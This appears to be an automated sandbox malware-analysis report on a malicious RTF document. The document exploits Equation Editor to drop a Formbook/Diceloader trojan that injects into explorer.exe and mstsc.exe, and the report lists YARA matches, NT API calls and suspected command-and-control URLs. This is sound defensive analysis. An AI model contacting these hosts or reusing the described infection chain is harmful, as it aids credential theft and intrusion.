      Source: explorer.exe, 00000009.00000000.421850492.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.422336388.0000000007524000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.929382715.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000009.00000002.928878903.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.421597302.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solarcyborg.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solarcyborg.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solarcyborg.com/btrd/PUS
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solarcyborg.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecareskin.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecareskin.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecareskin.com/btrd/www.opmk.monster
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thecareskin.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trygenesisx.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trygenesisx.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trygenesisx.com/btrd/www.jejeesclothing.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trygenesisx.comReferer:
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 10_2_0093AC37 LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,GetClientRect,GetWindowDC,CreateCompatibleBitmap,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleDC,SelectPalette,SelectPalette,RealizePalette,SelectObject,SelectObject,BitBlt,SelectObject,SelectObject,StretchBlt,SelectObject,SelectObject,BitBlt,SelectObject,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawIconEx,SelectObject,SelectPalette,SelectPalette,DeleteDC,DeleteDC,DeleteDC,ReleaseDC,GetLastError,DeleteObject,DeleteObject,DeleteObject,DeleteObject,10_2_0093AC37

      E-Banking Fraud

      Source: Yara match | File source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      Source: initial sample | Static file information: Filename: na.doc
      Source: na.doc, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
      Source: 7.2.ihbgfbin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: ihbgfbin.exe PID: 3736, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: ihbgfbin.exe PID: 3824, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: mstsc.exe PID: 3948, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\ihbgfbin.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exe
      Source: C:\Windows\SysWOW64\mstsc.exe | Process Stats: CPU usage > 49%
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Memory allocated: 770B0000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Memory allocated: 770B0000 page execute and read and write
      Source: C:\Windows\SysWOW64\mstsc.exe | Memory allocated: 770B0000 page execute and read and write
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001B4924 NtQueryInformationProcess
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001B891E NtQueryInformationProcess
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D600C4 NtCreateFile,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D60048 NtProtectVirtualMemory,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D60078 NtResumeThread,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5F9F0 NtClose,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5F900 NtReadFile,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FAE8 NtQueryInformationProcess,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FBB8 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FB68 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FC90 NtUnmapViewOfSection,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FC60 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FDC0 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FD8C NtDelayExecution,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FEA0 NtReadVirtualMemory,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FFB4 NtCreateSection,LdrInitializeThunk
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D60060 NtQuerySection
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D601D4 NtSetValueKey
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D6010C NtOpenDirectoryObject
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D607AC NtCreateMutant
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D60C40 NtGetContextThread
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D610D0 NtOpenProcessToken
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D61148 NtOpenThread
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5F8CC NtWaitForSingleObject
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D61930 NtSetContextThread
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5F938 NtWriteFile
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FAB8 NtQueryValueKey
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FA50 NtEnumerateValueKey
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FA20 NtQueryInformationFile
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FBE8 NtQueryVirtualMemory
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FB50 NtCreateKey
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FC48 NtSetInformationFile
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FC30 NtOpenProcess
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D61D80 NtSuspendThread
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FD5C NtEnumerateKey
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FE24 NtWriteVirtualMemory
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FFFC NtCreateProcessEx
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D5FF34 NtQueueApcThread
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CDEE12 NtProtectVirtualMemory
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CDD232 NtCreateFile
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CDEE0A NtProtectVirtualMemory
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A00C4 NtCreateFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A07AC NtCreateMutant,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FAB8 NtQueryValueKey,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FAE8 NtQueryInformationProcess,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FB68 NtFreeVirtualMemory,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FB50 NtCreateKey,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FBB8 NtQueryInformationToken,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229F900 NtReadFile,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229F9F0 NtClose,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FED0 NtAdjustPrivilegesToken,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FFB4 NtCreateSection,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FC60 NtMapViewOfSection,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FD8C NtDelayExecution,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FDC0 NtQuerySystemInformation,LdrInitializeThunk
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A0060 NtQuerySection
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A0078 NtResumeThread
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A0048 NtProtectVirtualMemory
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A010C NtOpenDirectoryObject
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A01D4 NtSetValueKey
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A0C40 NtGetContextThread
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A10D0 NtOpenProcessToken
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A1148 NtOpenThread
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FA20 NtQueryInformationFile
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FA50 NtEnumerateValueKey
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FBE8 NtQueryVirtualMemory
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229F8CC NtWaitForSingleObject
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229F938 NtWriteFile
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A1930 NtSetContextThread
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FE24 NtWriteVirtualMemory
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FEA0 NtReadVirtualMemory
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FF34 NtQueueApcThread
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FFFC NtCreateProcessEx
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FC30 NtOpenProcess
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FC48 NtSetInformationFile
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FC90 NtUnmapViewOfSection
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0229FD5C NtEnumerateKey
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022A1D80 NtSuspendThread
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009A330 NtCreateFile
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009A3E0 NtReadFile
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009A460 NtClose
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009A510 NtAllocateVirtualMemory
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009A3DC NtReadFile
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02049BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0204A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02049BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0204A042 NtQueryInformationProcess
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001BA298
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001B0514
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001B49D9
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001B5CA9
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001B1141
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001B81F0
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001BA28A
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001BA4F7
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001BA508
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001B78F8
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001B7D30
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_00741880
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_00740F60
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_00742358
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_00740B28
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_00741398
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D6E0C6
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D6E2E9
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D963DB
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E163BF
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DBA37B
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D72305
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DF443E
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D8C5F0
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DF05E3
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DB6540
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D7E6C1
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D74680
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E12622
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DBA634
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D7C7BC
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D7C85C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D9286D
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E049F5
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D869FE
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D729B2
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E1098E
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DBC920
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DF6BCB
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E1CBA4
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E12C9C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DFAC5E
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D7CD5B
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DA0D3B
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D8EE4C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DA2E2F
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DE2FDC
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E0CFB1
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D80F3F
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D8905A
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D73040
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DED06D
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D9D005
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DFD13F
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E11238
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D6F3CF
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D77353
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D81489
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DA5485
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DAD47D
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E135DA
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D7351F
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DA57C3
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DF579A
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E0771D
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E0F8EE
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DEF8C4
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DF5955
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DF394B
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E23A83
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D6FBD7
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DFDBDA
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D97B00
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00E0FDDD
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D9DF7C
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00DFBF14
      Source: C:\Windows\explorer.exe | Code function: 9_2_08200036
      Source: C:\Windows\explorer.exe | Code function: 9_2_081F7082
      Source: C:\Windows\explorer.exe | Code function: 9_2_081FE912
      Source: C:\Windows\explorer.exe | Code function: 9_2_081F8D02
      Source: C:\Windows\explorer.exe | Code function: 9_2_082045CD
      Source: C:\Windows\explorer.exe | Code function: 9_2_08201232
      Source: C:\Windows\explorer.exe | Code function: 9_2_081FBB32
      Source: C:\Windows\explorer.exe | Code function: 9_2_081FBB30
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CDD232
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CD3082
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CDC036
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CE05CD
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CD4D02
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CDA912
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CD7B30
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CD7B32
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0094884E
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0091C869
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00964908
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00912152
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0093DA85
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0093E2AE
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00959506
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00938741
